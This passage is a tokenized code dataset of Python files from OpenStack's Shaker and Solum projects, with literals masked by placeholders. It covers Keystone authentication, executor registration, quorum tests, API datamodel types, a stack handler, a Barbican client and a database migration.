<EOL> username = username , <EOL> password = password <EOL> ) <EOL> if CONF . use_identity_api_v3 : <EOL> passwd_kwargs . update ( dict ( <EOL> project_name = project_name , <EOL> user_domain_name = user_domain_name , <EOL> project_domain_name = project_domain_name , <EOL> trust_id = trust_id <EOL> ) ) <EOL> auth = keystone_identity . v3 . Password ( ** passwd_kwargs ) <EOL> else : <EOL> passwd_kwargs . update ( dict ( <EOL> tenant_name = project_name , <EOL> trust_id = trust_id <EOL> ) ) <EOL> auth = keystone_identity . v2 . Password ( ** passwd_kwargs ) <EOL> return auth </s>
<s> from shaker . engine . executors import flent <EOL> from shaker . engine . executors import iperf <EOL> from shaker . engine . executors import netperf <EOL> from shaker . engine . executors import shell <EOL> EXECUTORS = { <EOL> '<STR_LIT>' : shell . ShellExecutor , <EOL> '<STR_LIT>' : netperf . NetperfExecutor , <EOL> '<STR_LIT>' : iperf . IperfExecutor , <EOL> '<STR_LIT>' : iperf . IperfGraphExecutor , <EOL> '<STR_LIT>' : iperf . Iperf3Executor , <EOL> '<STR_LIT>' : flent . FlentExecutor , <EOL> '<STR_LIT>' : shell . ShellExecutor , <EOL> } <EOL> def get_executor ( test_definition , agent ) : <EOL> executor_class = test_definition [ '<STR_LIT:class>' ] <EOL> klazz = EXECUTORS . get ( executor_class , EXECUTORS [ '<STR_LIT>' ] ) <EOL> return klazz ( test_definition , agent ) </s>
<s> import functools <EOL> import mock <EOL> import testtools <EOL> from shaker . engine . executors import base as base_executor <EOL> from shaker . engine import quorum as quorum_pkg <EOL> STEP = <NUM_LIT:10> <EOL> LOSS_TIMEOUT = <NUM_LIT> <EOL> JOIN_TIMEOUT = <NUM_LIT> <EOL> make_quorum = functools . partial ( quorum_pkg . Quorum , polling_interval = STEP , <EOL> agent_loss_timeout = LOSS_TIMEOUT , <EOL> agent_join_timeout = JOIN_TIMEOUT ) <EOL> class DummyExecutor ( base_executor . BaseExecutor ) : <EOL> def __init__ ( self , duration = STEP ) : <EOL> super ( DummyExecutor , self ) . __init__ ( { } , None ) <EOL> self . duration = duration <EOL> def get_expected_duration ( self ) : <EOL> return self . duration <EOL> def process_reply ( self , message ) : <EOL> return super ( DummyExecutor , self ) . process_reply ( message ) <EOL> def get_command ( self ) : <EOL> return '<STR_LIT>' <EOL> class TestQuorum ( testtools . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . mock_time = mock . Mock ( ) <EOL> self . _mock_patch = mock . patch ( '<STR_LIT>' , self . mock_time ) <EOL> self . _mock_patch . start ( ) <EOL> return super ( TestQuorum , self ) . setUp ( ) <EOL> def tearDown ( self ) : <EOL> self . _mock_patch . stop ( ) <EOL> return super ( TestQuorum , self ) . tearDown ( ) <EOL> def _reply ( self , expected ) : <EOL> def reply_handler ( reply_message ) : <EOL> self . assertEqual ( expected , reply_message ) <EOL> return reply_handler <EOL> def _message_queue_gen ( self , event_stream , fail_at_end = True ) : <EOL> for event in event_stream : <EOL> self . mock_time . return_value = event [ '<STR_LIT:time>' ] <EOL> yield ( event [ '<STR_LIT>' ] , self . _reply ( event [ '<STR_LIT>' ] ) ) <EOL> def test_poll_reply ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> def test_poll_reply_unknown_agent_ignored ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> def test_lost_agent ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:10> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_agent_loss_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = LOSS_TIMEOUT ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = LOSS_TIMEOUT ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_good_and_lost ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:10> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( set ( result . keys ( ) ) , set ( test_case . keys ( ) ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_wait_agentexecutening_long_test ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP * <NUM_LIT:9> ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:4> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:9> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( duration = STEP * <NUM_LIT:9> ) <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_good_and_interrupted ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:1> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , command = '<STR_LIT>' , <EOL> start_at = STEP * <NUM_LIT:2> , expected_duration = STEP ) , <EOL> time = <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = <NUM_LIT:20> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream , <EOL> fail_at_end = False ) ) <EOL> test_case = { <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> '<STR_LIT>' : DummyExecutor ( ) , <EOL> } <EOL> result = quorum . execute ( test_case ) <EOL> self . assertEqual ( result . keys ( ) , test_case . keys ( ) ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> self . assertEqual ( '<STR_LIT>' , result [ '<STR_LIT>' ] [ '<STR_LIT:status>' ] ) <EOL> def test_join_succeed ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , polling_interval = STEP , <EOL> expected_duration = <NUM_LIT:0> ) , <EOL> time = STEP ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:2> ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = STEP * <NUM_LIT:2> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> result = quorum . join ( [ '<STR_LIT>' ] ) <EOL> lost = [ agent_id for agent_id , r in result . items ( ) <EOL> if r [ '<STR_LIT:status>' ] == '<STR_LIT>' ] <EOL> self . assertEqual ( [ ] , lost ) <EOL> def test_join_failed ( self ) : <EOL> self . mock_time . return_value = <NUM_LIT:0> <EOL> event_stream = [ <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , agent_id = '<STR_LIT>' ) , <EOL> reply = dict ( operation = '<STR_LIT>' , polling_interval = STEP , <EOL> expected_duration = <NUM_LIT:0> ) , <EOL> time = STEP ) , <EOL> dict ( msg = dict ( operation = '<STR_LIT>' , <EOL> agent_id = quorum_pkg . HEARTBEAT_AGENT ) , <EOL> reply = dict ( operation = '<STR_LIT:none>' ) , <EOL> time = JOIN_TIMEOUT + STEP * <NUM_LIT:2> ) , <EOL> ] <EOL> quorum = make_quorum ( self . _message_queue_gen ( event_stream ) ) <EOL> result = quorum . join ( [ '<STR_LIT>' ] ) <EOL> lost = [ agent_id for agent_id , r in result . items ( ) <EOL> if r [ '<STR_LIT:status>' ] == '<STR_LIT>' ] <EOL> self . assertEqual ( [ '<STR_LIT>' ] , lost ) </s>
<s> import json <EOL> from functionaltests . api import base <EOL> class TestExtensionController ( base . TestCase ) : <EOL> def test_extensions_get_all ( self ) : <EOL> resp , body = self . client . get ( '<STR_LIT>' ) <EOL> data = json . loads ( body ) <EOL> self . assertEqual ( resp . status , <NUM_LIT:200> ) <EOL> self . assertEqual ( data , [ ] ) </s>
<s> import copy <EOL> import pecan <EOL> from pecan import core <EOL> from solum . api . controllers . camp . v1_1 . datamodel import types as camp_types <EOL> from solum . api . controllers . camp . v1_1 import uris <EOL> from solum . api . controllers import common_types <EOL> from solum . api . controllers . v1 . datamodel import types as api_types <EOL> from solum . api . handlers . camp import attribute_definition_handler <EOL> class AttributeLink ( common_types . Link ) : <EOL> """<STR_LIT>""" <EOL> required = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> mutable = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> consumer_mutable = camp_types . BooleanType <EOL> """<STR_LIT>""" <EOL> @ classmethod <EOL> def from_json ( cls , dct ) : <EOL> ret_val = cls ( ) <EOL> for key , value in dct . items ( ) : <EOL> if hasattr ( ret_val , key ) : <EOL> setattr ( ret_val , key , value ) <EOL> return ret_val <EOL> def fix_uris ( self , host_url ) : <EOL> handler = ( attribute_definition_handler . <EOL> AttributeDefinitionHandler ( pecan . request . security_context ) ) <EOL> raw_def = handler . get ( self . href ) <EOL> if not raw_def : <EOL> core . abort ( <NUM_LIT> , <EOL> '<STR_LIT>' % <EOL> self . href ) <EOL> self . target_name = raw_def . name <EOL> self . href = uris . ATTRIBUTE_DEF_URI_STR % ( host_url , self . href ) <EOL> class TypeDefinition ( api_types . Base ) : <EOL> """<STR_LIT>""" <EOL> documentation = common_types . Uri <EOL> """<STR_LIT>""" <EOL> inherits_from = [ common_types . Link ] <EOL> """<STR_LIT>""" <EOL> attribute_definition_links = [ AttributeLink ] <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwds ) : <EOL> super ( TypeDefinition , self ) . __init__ ( ** kwds ) <EOL> @ classmethod <EOL> def from_json ( cls , dct ) : <EOL> ret_val = cls ( ) <EOL> for key , value in dct . items ( ) : <EOL> if key == '<STR_LIT>' : <EOL> inherit_links = [ ] <EOL> for l_dict in value : <EOL> link = common_types . Link ( href = l_dict [ '<STR_LIT>' ] , <EOL> target_name = l_dict [ '<STR_LIT>' ] ) <EOL> inherit_links . append ( link ) <EOL> setattr ( ret_val , '<STR_LIT>' , inherit_links ) <EOL> elif key == '<STR_LIT>' : <EOL> ad_links = [ ] <EOL> for ad_dct in value : <EOL> ad_link = AttributeLink . from_json ( ad_dct ) <EOL> ad_links . append ( ad_link ) <EOL> setattr ( ret_val , '<STR_LIT>' , ad_links ) <EOL> elif hasattr ( ret_val , key ) : <EOL> setattr ( ret_val , key , value ) <EOL> else : <EOL> core . abort ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return ret_val <EOL> def fix_uris ( self , host_url ) : <EOL> """<STR_LIT>""" <EOL> ret_val = copy . deepcopy ( self ) <EOL> ret_val . uri = uris . TYPE_DEF_URI_STR % ( host_url , ret_val . uri ) <EOL> if ret_val . inherits_from : <EOL> for ih_link in ret_val . inherits_from : <EOL> ih_link . href = uris . TYPE_DEF_URI_STR % ( host_url , ih_link . href ) <EOL> for ad_link in ret_val . attribute_definition_links : <EOL> ad_link . fix_uris ( host_url ) <EOL> return ret_val <EOL> class TypeDefinitions ( api_types . Base ) : <EOL> """<STR_LIT>""" <EOL> type_definition_links = [ common_types . Link ] <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kwds ) : <EOL> super ( TypeDefinitions , self ) . __init__ ( ** kwds ) </s>
<s> import string <EOL> import wsme <EOL> from wsme import types as wtypes <EOL> from solum . api . controllers import common_types <EOL> from solum . openstack . common . gettextutils import _ <EOL> class Base ( wtypes . Base ) : <EOL> """<STR_LIT>""" <EOL> uri = common_types . Uri <EOL> "<STR_LIT>" <EOL> base_url = common_types . Uri <EOL> "<STR_LIT>" <EOL> uuid = wtypes . text <EOL> "<STR_LIT>" <EOL> def get_name ( self ) : <EOL> return self . __name <EOL> def set_name ( self , value ) : <EOL> allowed_chars = string . ascii_letters + string . digits + '<STR_LIT>' <EOL> for ch in value : <EOL> if ch not in allowed_chars : <EOL> raise ValueError ( _ ( '<STR_LIT>' ) ) <EOL> self . __name = value <EOL> name = wtypes . wsproperty ( str , get_name , set_name , mandatory = True ) <EOL> "<STR_LIT>" <EOL> type = wtypes . text <EOL> "<STR_LIT>" <EOL> description = wtypes . text <EOL> "<STR_LIT>" <EOL> tags = [ wtypes . text ] <EOL> "<STR_LIT>" <EOL> project_id = wtypes . text <EOL> "<STR_LIT>" <EOL> user_id = wtypes . text <EOL> "<STR_LIT>" <EOL> def __init__ ( self , ** kwds ) : <EOL> self . __name = wsme . Unset <EOL> super ( Base , self ) . __init__ ( ** kwds ) <EOL> @ classmethod <EOL> def from_db_model ( cls , m , host_url ) : <EOL> json = m . as_dict ( ) <EOL> json [ '<STR_LIT:type>' ] = m . __tablename__ <EOL> json [ '<STR_LIT>' ] = '<STR_LIT>' % ( host_url , m . __resource__ , m . uuid ) <EOL> del json [ '<STR_LIT:id>' ] <EOL> return cls ( ** ( json ) ) <EOL> def as_dict ( self , db_model ) : <EOL> valid_keys = ( attr for attr in db_model . __dict__ . keys ( ) <EOL> if attr [ : <NUM_LIT:2> ] != '<STR_LIT>' and attr != '<STR_LIT>' ) <EOL> return self . as_dict_from_keys ( valid_keys ) <EOL> def as_dict_from_keys ( self , keys ) : <EOL> return dict ( ( k , getattr ( self , k ) ) <EOL> for k in keys <EOL> if hasattr ( self , k ) and <EOL> getattr ( self , k ) != wsme . Unset ) <EOL> class MultiType ( wtypes . UserType ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * types ) : <EOL> self . types = types <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' . join ( map ( str , self . types ) ) <EOL> def validate ( self , value ) : <EOL> for t in self . types : <EOL> try : <EOL> return wtypes . validate_value ( t , value ) <EOL> except ( ValueError , TypeError ) : <EOL> pass <EOL> else : <EOL> raise ValueError ( <EOL> _ ( "<STR_LIT>" ) <EOL> % { '<STR_LIT:type>' : self . types , '<STR_LIT:value>' : type ( value ) } ) <EOL> PortType = wtypes . IntegerType ( minimum = <NUM_LIT:1> , maximum = <NUM_LIT> ) </s>
<s> import uuid <EOL> from solum . api . handlers import handler <EOL> from solum . common import catalog <EOL> from solum . common import clients <EOL> from solum import objects <EOL> from solum . openstack . common import log as logging <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class InfrastructureStackHandler ( handler . Handler ) : <EOL> """<STR_LIT>""" <EOL> def get ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return objects . registry . InfrastructureStack . get_by_uuid ( <EOL> self . context , id ) <EOL> def update ( self , id , data ) : <EOL> """<STR_LIT>""" <EOL> updated = objects . registry . InfrastructureStack . update_and_save ( <EOL> self . context , id , data ) <EOL> return updated <EOL> def delete ( self , id ) : <EOL> """<STR_LIT>""" <EOL> db_obj = objects . registry . InfrastructureStack . get_by_uuid ( <EOL> self . context , id ) <EOL> db_obj . destroy ( self . context ) <EOL> def create ( self , data ) : <EOL> """<STR_LIT>""" <EOL> db_obj = objects . registry . InfrastructureStack ( ) <EOL> db_obj . update ( data ) <EOL> db_obj . uuid = str ( uuid . uuid4 ( ) ) <EOL> db_obj . user_id = self . context . user <EOL> db_obj . project_id = self . context . tenant <EOL> self . _create_zaqar_queue ( db_obj . uuid ) <EOL> db_obj . heat_stack_id = self . _deploy_infra ( data . get ( '<STR_LIT>' ) ) <EOL> db_obj . create ( self . context ) <EOL> return db_obj <EOL> def _create_zaqar_queue ( self , queue_name ) : <EOL> osc = clients . OpenStackClients ( self . context ) <EOL> osc . zaqar ( ) . queue ( queue_name ) <EOL> def _deploy_infra ( self , image_id ) : <EOL> osc = clients . OpenStackClients ( self . context ) <EOL> parameters = { '<STR_LIT:image>' : image_id } <EOL> template = catalog . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> created_stack = osc . heat ( ) . stacks . create ( stack_name = '<STR_LIT>' , <EOL> template = template , <EOL> parameters = parameters ) <EOL> return created_stack [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> def get_all ( self ) : <EOL> """<STR_LIT>""" <EOL> return objects . registry . InfrastructureStackList . get_all ( self . context ) </s>
<s> from barbicanclient import client as barbicanclient <EOL> from keystoneclient . auth import identity <EOL> from keystoneclient import session <EOL> from oslo_config import cfg <EOL> from solum . openstack . common import importutils <EOL> class BarbicanClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , verify = True ) : <EOL> self . verify = verify <EOL> self . _admin_client = None <EOL> @ property <EOL> def admin_client ( self ) : <EOL> if not self . _admin_client : <EOL> self . _admin_client = self . _barbican_admin_init ( ) <EOL> return self . _admin_client <EOL> def _barbican_admin_init ( self ) : <EOL> importutils . import_module ( '<STR_LIT>' ) <EOL> auth = identity . v2 . Password ( <EOL> auth_url = cfg . CONF . keystone_authtoken . auth_uri , <EOL> username = cfg . CONF . keystone_authtoken . admin_user , <EOL> password = cfg . CONF . keystone_authtoken . admin_password , <EOL> tenant_name = cfg . CONF . keystone_authtoken . admin_tenant_name ) <EOL> sess = session . Session ( auth = auth , verify = self . verify ) <EOL> return barbicanclient . Client ( session = sess ) </s>
<s> from solum . objects import base <EOL> class Pipeline ( base . CrudMixin ) : <EOL> VERSION = '<STR_LIT:1.0>' <EOL> class PipelineList ( list , base . CrudListMixin ) : <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from alembic import op <EOL> import sqlalchemy as sa <EOL> revision = '<STR_LIT>' <EOL> down_revision = '<STR_LIT>' <EOL> def upgrade ( ) : <EOL> op . alter_column ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> type_ = sa . String ( length = <NUM_LIT:100> ) , <EOL> existing_type = sa . String ( length = <NUM_LIT> ) , <EOL> existing_nullable = True , <EOL> ) <EOL> def downgrade ( ) : <EOL> op . alter_column ( '<STR_LIT:image>' , '<STR_LIT>' , <EOL> type_ = sa . String ( length = <NUM_LIT> ) , <EOL> existing_type = sa . String ( length = <NUM_LIT:100> ) , <EOL> existing_nullable = True , <EOL> ) </s>
<s> import json <EOL> import mock <EOL> from solum . api . controllers . camp . v1_1 import assemblies <EOL> from solum import objects <EOL> from solum . tests import base <EOL> from solum . tests import fakes <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = fakes . FakePecanRequest ) <EOL> @ mock . patch ( '<STR_LIT>' , new_callable = fakes . FakePecanResponse ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> class TestAssemblies ( base . BaseTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAssemblies , self ) . setUp ( ) <EOL> objects . load ( ) <EOL> def test_assemblies_get ( self , PlanHandler , AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> hand_get_all = AssemblyHandler . return_value . get_all <EOL> fake_assembly = fakes . FakeAssembly ( ) <EOL> hand_get_all . return_value = [ fake_assembly ] <EOL> resp = assemblies . AssembliesController ( ) . get ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT:200> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp [ '<STR_LIT:result>' ] . assembly_links ) <EOL> assembly_links = resp [ '<STR_LIT:result>' ] . assembly_links <EOL> self . assertEqual ( <NUM_LIT:1> , len ( assembly_links ) ) <EOL> self . assertEqual ( fake_assembly . name , assembly_links [ <NUM_LIT:0> ] . target_name ) <EOL> def test_assemblies_post_no_content_type ( self , PlanHandler , <EOL> AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> request_mock . content_type = None <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_none ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = None <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_empty_json ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = '<STR_LIT:{}>' <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_bad_rel_uri ( self , PlanHandler , <EOL> AssemblyHandler , resp_mock , <EOL> request_mock ) : <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> assemblies . AssembliesController ( ) . post ( ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> def test_assemblies_post_ref_rel_uris ( self , PlanHandler , AssemblyHandler , <EOL> resp_mock , request_mock ) : <EOL> hand_get = PlanHandler . return_value . get <EOL> hand_get . return_value = fakes . FakePlan ( ) <EOL> hand_create_from_plan = AssemblyHandler . return_value . create_from_plan <EOL> fake_assembly = fakes . FakeAssembly ( ) <EOL> hand_create_from_plan . return_value = fake_assembly <EOL> cntrl = assemblies . AssembliesController ( ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) <EOL> ref_object = { '<STR_LIT>' : <EOL> '<STR_LIT>' } <EOL> request_mock . content_type = '<STR_LIT:application/json>' <EOL> request_mock . body = json . dumps ( ref_object ) <EOL> resp = cntrl . post ( ) <EOL> self . assertIsNotNone ( resp ) <EOL> self . assertEqual ( <NUM_LIT> , resp_mock . status ) <EOL> self . assertIsNotNone ( resp_mock . location ) <EOL> self . assertEqual ( fake_assembly . name , resp [ '<STR_LIT:name>' ] ) </s>
